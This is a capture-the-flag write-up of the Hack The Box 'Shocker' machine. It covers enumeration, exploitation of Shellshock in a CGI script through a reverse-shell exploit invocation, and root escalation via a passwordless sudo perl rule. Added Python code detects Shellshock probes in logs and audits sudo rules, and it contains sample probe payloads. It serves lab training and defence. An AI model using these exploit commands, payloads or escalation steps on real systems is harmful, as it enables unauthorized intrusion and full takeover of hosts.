Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and methods shown here are for learning and discussion only. Do not use the tools or the approach described here for any illegal purpose; I accept no responsibility for any consequences, misuse or damage arising from it.

Service detection

┌──(root💀kali)-[~/HTB/Shocker]
└─# nmap -sV -Pn 10.10.10.56 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 01:58 EST
Nmap scan report for 10.10.10.56
Host is up (0.35s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1015.68 seconds

Port 80 serves a simple static page.

Directory brute-forcing

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e * -t 100 -u http://10.10.10.56

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.56/_21-11-30_02-12-39.txt

Error Log: /root/dirsearch/logs/errors-21-11-30_02-12-39.log

Target: http://10.10.10.56/

[02:12:41] Starting:
[02:14:06] 200 -  137B  - /index.html

Only a single static page turns up, which is a bit disappointing.

Let's try a larger wordlist:

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e * -t 100 -u http://10.10.10.56 -w /usr/share/wordlists/Web_Content/directory-list-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.56/_21-11-30_02-18-19.txt

Error Log: /root/dirsearch/logs/errors-21-11-30_02-18-19.log

Target: http://10.10.10.56/

[02:19:12] Starting:
[02:31:53] 403 -  299B  - /cgi-bin/

Task Completed

Only a cgi-bin folder is found. We brute-force it with gobuster, adding the .php, .sh and .html extensions:

└─# gobuster dir --url http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -t 30 -x .php,.sh,.html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,html,php
[+] Timeout:                 10s
===============================================================
2021/11/30 05:45:13 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.html       (Status: 403) [Size: 308]
/.hta.php             (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/.hta.sh              (Status: 403) [Size: 301]
/.htaccess.php        (Status: 403) [Size: 307]
/.htaccess.sh         (Status: 403) [Size: 306]
/.hta.html            (Status: 403) [Size: 303]
/.htpasswd.php        (Status: 403) [Size: 307]
/.hta                 (Status: 403) [Size: 298]
/.htpasswd.sh         (Status: 403) [Size: 306]
/.htaccess.html       (Status: 403) [Size: 308]
/user.sh              (Status: 200) [Size: 118]
===============================================================
2021/11/30 05:48:46 Finished
===============================================================

A user.sh file is found.

Opening this file in a browser shows nothing useful, but its content is returned with curl:

┌──(root💀kali)-[~/HTB/Shocker]
└─# curl -s http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 05:48:43 up  3:52,  0 users,  load average: 0.01, 0.03, 0.00

Use Nikto to probe the script for vulnerability information:

┌──(root💀kali)-[~/HTB/Shocker]
└─# nikto -h http://10.10.10.56/cgi-bin/user.sh
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
+ Start Time:         2021-11-30 05:53:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /cgi-bin/user.sh/kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php
+ /cgi-bin/user.sh/lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist
+ /cgi-bin/user.sh/splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ /cgi-bin/user.sh/ssdefs/: Siteseed pre 1.4.2 has 'major' security problems.
+ /cgi-bin/user.sh/sshome/: Siteseed pre 1.4.2 has 'major' security problems.
+ /cgi-bin/user.sh/tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
+ /cgi-bin/user.sh/tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin

The two "Uncommon header" lines are Nikto's Shellshock probes being echoed back: the Apache 2.4.18 host appears to be vulnerable to CVE-2014-6271 and CVE-2014-6278.
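For the defending side, the Nikto hits above are the whole Shellshock signature: a CGI handler copies request headers (User-Agent, Referer) and the query string into the script's environment, and an unpatched bash executes whatever follows a function definition ("() {") in such a variable. The following Python is an added example, not code from the original write-up or from any of the tools it uses: it flags requests carrying that prefix in Apache combined-format access logs, and runs the standard local check for whether the installed bash still imports functions from environment variables. The log lines are constructed for the demonstration (the Nikto-style probe string mirrors the header names seen in the scan output) and the function names are mine.

```python
import re
import shutil
import subprocess

# Apache "combined" access-log format: client, ident, user, time, request,
# status, size, referer, user-agent.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The CVE-2014-6271 family needs an environment value that begins with a bash
# function definition: "() {" with optional whitespace. Because mod_cgi exports
# headers and the query string as environment variables, this prefix in any
# request field is the indicator to alert on.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines (not from the target): a normal curl fetch, a
# Nikto-style probe in the User-Agent, a probe in the Referer, and a benign hit.
SAMPLE_LOG = [
    '10.10.14.15 - - [30/Nov/2021:05:48:43 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"',
    '10.10.14.15 - - [30/Nov/2021:05:53:14 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; echo 93e4r0-cve-2014-6271: true"',
    '10.10.14.15 - - [30/Nov/2021:05:53:15 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() {:;}; echo probe" "Mozilla/5.0"',
    '10.10.14.15 - - [30/Nov/2021:06:01:02 -0500] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
]


def find_shellshock_requests(lines):
    """Return one finding per log line whose request line, referer or
    user-agent carries a bash function-definition prefix."""
    findings = []
    for line in lines:
        m = COMBINED_LOG.match(line.strip())
        if not m:
            continue  # not combined format; a real pipeline would count these
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else m.group("request")
        for field in ("request", "referer", "agent"):
            if FUNC_DEF.search(m.group(field)):
                findings.append({
                    "ip": m.group("ip"),
                    "path": path,
                    "field": field,          # which header carried the prefix
                    "status": int(m.group("status")),  # 200 on a CGI path is the worrying case
                })
                break
    return findings


def local_bash_imports_functions():
    """Post-patch verification on the host itself: a vulnerable bash runs the
    command appended to a function-shaped variable, so 'vulnerable' is printed.
    Returns True if vulnerable, False if patched, None if bash is unavailable."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    probe_env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    try:
        out = subprocess.run([bash, "-c", "echo test"], env=probe_env,
                             capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.SubprocessError):
        return None
    return "vulnerable" in out


if __name__ == "__main__":
    for f in find_shellshock_requests(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} via {f['field']} (HTTP {f['status']})")
    print("local bash imports functions from the environment:",
          local_bash_imports_functions())
```

On the sample data the detector reports the User-Agent and Referer probes and ignores the two ordinary requests; in a real deployment the same regex belongs in the WAF or log pipeline, and a 200 response on a cgi-bin path after such a request is the case to escalate. The local check is what to run after applying the bash update on a host like this one; a patched bash prints only "test".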

We found a public exploit script for it.

Copy the exploit locally and run it against the target:

python exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4242 pages="/cgi-bin/user.sh"

We get an initial shell:

┌──(root💀kali)-[~/HTB/Shocker]
└─# python exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4242 pages="/cgi-bin/user.sh"
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
10.10.10.56> whoami
shelly

The user.txt flag is in shelly's home directory.

Privilege escalation

Checking sudo privileges shows that perl can be run as root without a password:

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Use perl to spawn a root shell:

10.10.10.56> sudo perl -e 'exec "/bin/sh";'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

10.10.10.56> whoami
root
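The sudo rule is the root cause here: granting an interpreter such as perl with no argument restriction is the same as granting a root shell, and NOPASSWD removes the last speed bump. As an added example (mine, not part of the original write-up or any tool it uses), the following Python audits the rule section of `sudo -l` output and flags entries that hand out unrestricted command runners, distinguishing them from rules that pin the interpreter to a fixed script. The sample input is a constructed copy of the page's `sudo -l` output with two invented extra rules; the interpreter list and function names are my own choices.

```python
import re

# Interpreters and shells that execute arbitrary commands. A sudo rule naming
# one of these without arguments is equivalent to unrestricted root.
COMMAND_RUNNERS = {
    "perl", "python", "python2", "python3", "ruby", "sh", "bash", "dash", "zsh",
    "awk", "gawk", "find", "vim", "vi", "less", "more", "env",
}

# One rule line as printed by `sudo -l`: "(runas) TAG: cmd1, cmd2".
RULE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')

# Constructed sample: the page's rule plus two invented ones for contrast.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (root) /usr/bin/python3 /opt/uptime.py
"""


def parse_sudo_l(text):
    """Parse the 'may run the following commands' section of `sudo -l`
    output into (runas, tags, command) tuples, one per command."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules


def audit_sudo_rules(text):
    """Return (command, reason) findings for rules worth a sudoers review."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        if cmd == "ALL":
            findings.append((cmd, "unrestricted command set for " + runas))
            continue
        argv = cmd.split()
        base = argv[0].rsplit("/", 1)[-1]   # /usr/bin/perl -> perl
        if base not in COMMAND_RUNNERS:
            continue
        if len(argv) == 1:
            reason = "interpreter/shell with no argument restriction: equivalent to a root shell"
        else:
            reason = "interpreter with a fixed script: verify the script and its directory are not writable by the user"
        if "NOPASSWD" in tags:
            reason += " (no password required)"
        findings.append((cmd, reason))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"{cmd}: {reason}")
```

On the sample the perl rule is reported as a root-shell equivalent with no password, the python3 rule is reported for script-permission review, and the systemctl rule passes. The fix on a box like this is to replace the interpreter rule with the specific command the user actually needs (for an uptime script, a rule that names that script with its fixed arguments and no NOPASSWD).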
